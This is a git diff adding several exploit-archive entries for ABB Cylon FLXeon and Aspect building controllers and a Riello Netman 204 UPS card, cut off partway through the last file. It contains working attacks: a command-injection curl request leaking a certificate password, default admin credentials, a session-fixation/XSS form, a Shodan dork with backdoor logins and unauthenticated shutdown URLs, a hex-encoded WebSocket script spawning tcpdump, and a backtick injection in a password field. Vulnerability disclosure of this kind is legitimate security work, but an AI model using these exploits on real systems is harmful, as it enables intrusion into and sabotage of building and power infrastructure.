diff --git a/exploits/multiple/hardware/52178.txt b/exploits/multiple/hardware/52178.txt new file mode 100644 index 000000000..c7dd15e81 --- /dev/null +++ b/exploits/multiple/hardware/52178.txt @@ -0,0 +1,96 @@ +# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: An authenticated attacker can access sensitive information via the system logs +page of ABB Cylon FLXeon controllers. The logs expose critical data, including the +OpenSSL password for stored certificates. This information can be leveraged for further +attacks, such as decrypting encrypted communications, impersonation, or gaining deeper +system access. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5920 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php +CVE ID: CVE-2024-48852 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist) +> -H "Cookie: user_sid=xxx" \ +> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}" + +-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. -- +Feb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12) +Feb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7) +Feb 13 12:38:26 node[5810]: at emitNone (events.js:105:13) +Feb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7) +Feb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7) +Feb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve"} +... +... +Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/ +... +... \ No newline at end of file diff --git a/exploits/multiple/hardware/52179.txt b/exploits/multiple/hardware/52179.txt new file mode 100644 index 000000000..c42ed480b --- /dev/null +++ b/exploits/multiple/hardware/52179.txt @@ -0,0 +1,79 @@ +ABB Cylon FLXeon 9.3.4 Default Credentials + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx) + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default administrative +credentials that can be guessed in remote password attacks and gain full control of +the system. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5919 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ cat cyloncreds.txt +admin:cylonctl +cxpro:siteguide +UC32Net:CylonCtl \ No newline at end of file diff --git a/exploits/multiple/hardware/52180.txt b/exploits/multiple/hardware/52180.txt new file mode 100644 index 000000000..bed7c5315 --- /dev/null +++ b/exploits/multiple/hardware/52180.txt @@ -0,0 +1,50 @@ +# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series. However, +exploitation is limited to specific conditions due to the server's CORS configuration +(Access-Control-Allow-Origin: * without Access-Control-Allow-Credentials: true). The +vulnerability can only be exploited under the following scenarios: + Same Domain: The attacker must host the malicious page on the same domain as the + target server. + Man-in-the-Middle (MitM): The attacker can intercept and modify traffic between + the user and the server (e.g., on an unsecured network). + Local Area Network (LAN) Access: The attacker must have access to the same network + as the target server. + Subdomains: The attacker can host the malicious page on a subdomain if the server + allows it. + Misconfigured CORS: The server’s CORS policy is misconfigured to allow certain + origins or headers. + Reflected XSS: The attacker can exploit a reflected XSS vulnerability to execute + JavaScript in the context of the target origin. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5918 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php \ No newline at end of file diff --git a/exploits/multiple/hardware/52182.txt b/exploits/multiple/hardware/52182.txt new file mode 100644 index 000000000..6ac0c850e --- /dev/null +++ b/exploits/multiple/hardware/52182.txt @@ -0,0 +1,81 @@ +# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability +# Advisory ID: ZSL-2025-5916 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php +# CVE ID: CVE-2024-11317 +# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317 + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session +fixation, allowing an attacker to set a predefined PHPSESSID value. An +attacker can leverage an unauthenticated reflected XSS vulnerability in +jsonProxy.php to inject a crafted request, forcing the victim to adopt +a fixated session. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + + + +
+ + " /> + +
+ + \ No newline at end of file diff --git a/exploits/multiple/hardware/52183.txt b/exploits/multiple/hardware/52183.txt new file mode 100644 index 000000000..980205706 --- /dev/null +++ b/exploits/multiple/hardware/52183.txt @@ -0,0 +1,70 @@ +# Exploit Title: Netman 204 - Remote command with out authentication +# Date: 2/4/2025 +# Exploit Author: parsa rezaie khiabanloo +# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204) +# Version: netman-204 +# Tested on: Windows/Linux + +Step 1 : Attacker can using these dorks then can find the UPS panel . + +Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin + +# We Found Two panel Yellow and blue + +Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups . + +Yellow Panel : username and password : eurek + +Some exploits for that : + +http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek +or +https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek + +Due to flaws in parameter validation, the URL can be shortened to: + +http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek +or +https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek + + +Blue Panel : username and password : admin + +Some Critical leaks without authentication we can see : + +http://IP/administration-commands.html +http://IP/administration.html +http://IP/administration.html# +http://IP/administration.html#LDAP +http://IP/administration.html#active-users +http://IP/administration.html#firmware-upgrade +http://IP/configuration.html +http://IP/history.html +http://IP/index.html +http://IP/login.html +http://IP/system-overview.html +http://IP/table.html + +#With using up paths we can see the details of the UPS without authentication . + +First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) + +Some Remote commands without authentication : + +http://IP/administration-commands.html +http://IP/administration-commands.html# +http://IP/administration-commands.html#reboot-irms +http://IP/administration-commands.html#reboot-mdu +http://IP/administration-commands.html#reboot-xts +http://IP/administration-commands.html#shutdown +http://IP/administration-commands.html#shutdown-irms +http://IP/administration-commands.html#shutdown-mdu +http://IP/administration-commands.html#shutdown-restore +http://IP/administration-commands.html#shutdown-restore-irms +http://IP/administration-commands.html#shutdown-restore-mdu +http://IP/administration-commands.html#shutdown-restore-xts +http://IP/administration-commands.html#shutdown-xts +http://IP/administration-commands.html#shutdownrestore +http://IP/administration-commands.html#switch-irms +http://IP/administration-commands.html#switch-on-bypass +http://IP/administration-commands.html#test-battery \ No newline at end of file diff --git a/exploits/multiple/hardware/52184.txt b/exploits/multiple/hardware/52184.txt new file mode 100644 index 000000000..2edfc01c1 --- /dev/null +++ b/exploits/multiple/hardware/52184.txt @@ -0,0 +1,131 @@ +# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 +# Advisory ID: ZSL-2025-5913 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php +# CVE ID: CVE-2024-48849 +# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated +WebSocket implementation that allows an attacker to execute the tcpdump command. +This command captures network traffic and filters it on serial ports 4855 and 4851, +which are relevant to the device's services. The vulnerability can be exploited in +a loop to start multiple instances of tcpdump, leading to resource exhaustion, denial +of service (DoS) conditions, and potential data exfiltration. The lack of authentication +on the WebSocket interface allows unauthorized users to continuously spawn new tcpdump +processes, amplifying the attack's impact. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +21.04.2024 + +EOC + +cat << "EOF" + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + +EOF +echo -ne "\n-------------------------------------------------------" +echo -ne "\nABB Cylon BACnet Building Controllers WebSocket Exploit" +echo -ne "\n-------------------------------------------------------\n" +if [ "$#" -ne 1 ]; then + echo -ne "\nUsage: $0 [ipaddr]\n\n" + exit +fi +IP=$1 +TARGET="wss://$IP:443/ws" +PID=$! +echo "$PID" + +STOP_SERVICE=`echo -e \ +"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\ +"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\ +"\x64\x22\x3A\x22\x73\x74\x6F\x70\x22\x2C\x22\x70\x61"\ +"\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65\x22"\ +"\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65\x72"\ +"\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A\x31"\ +"\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30\x7D"\ +"\x7D"` #stop tcpdump smartRouter capture + +START_SERVICE=`echo -e \ +"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\ +"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\ +"\x64\x22\x3A\x22\x73\x74\x61\x72\x74\x22\x2C\x22\x70"\ +"\x61\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65"\ +"\x22\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65"\ +"\x72\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A"\ +"\x31\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30"\ +"\x7D\x7D"` #start tcpdump smartRouter capture + +echo -e "\n[+] Sending JSONRPC => $START_SERVICE\n" +sleep 1 +echo "$START_SERVICE"| +websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v +sleep 2 +echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n" +sleep 1 +echo "$STOP_SERVICE"| +websocat -k -1 -B 251 -n "$TARGET" -v +echo -e "\n[*] Done" + +<< "LOG" +$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt +$ cat /usr/local/aam/var/xaa +$ cat /usr/local/aam/var/xab +$ cat /usr/local/aam/var/xac +$ cat /usr/local/aam/var/xad +... +#Apr 21 23:12:51 kernel: device lo left promiscuous mode +#Apr 21 23:12:34 kernel: device lo entered promiscuous mode +#Apr 21 23:12:34 node[196]: ws connect +... +LOG \ No newline at end of file diff --git a/exploits/multiple/hardware/52186.txt b/exploits/multiple/hardware/52186.txt new file mode 100644 index 000000000..9f6dc15b2 --- /dev/null +++ b/exploits/multiple/hardware/52186.txt @@ -0,0 +1,81 @@ +# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE) +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote +root code execution via the /api/users/password endpoint. An attacker with valid +credentials can inject arbitrary system commands by manipulating the newPassword PUT +parameter. The issue arises in users.js, where the new password is hashed and improperly +escaped before being passed to ChildProcess.exec() within a usermod command, allowing +out of band (blind) command injection. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5912 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php +CVE ID: CVE-2024-48841 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k -X PUT "https://7.3.3.1/api/users/password" \ +> -H "Cookie: user_sid=xxx" \ +> -H "Content-Type: application/json" \ +> --data '{"oldPassword":"KAKA","newPassword":"ZULU`sleep 7`"}' \ No newline at end of file diff --git a/exploits/multiple/hardware/52188.txt b/exploits/multiple/hardware/52188.txt new file mode 100644 index 000000000..a7a5de823 --- /dev/null +++ b/exploits/multiple/hardware/52188.txt @@ -0,0 +1,92 @@ +# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated) +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® 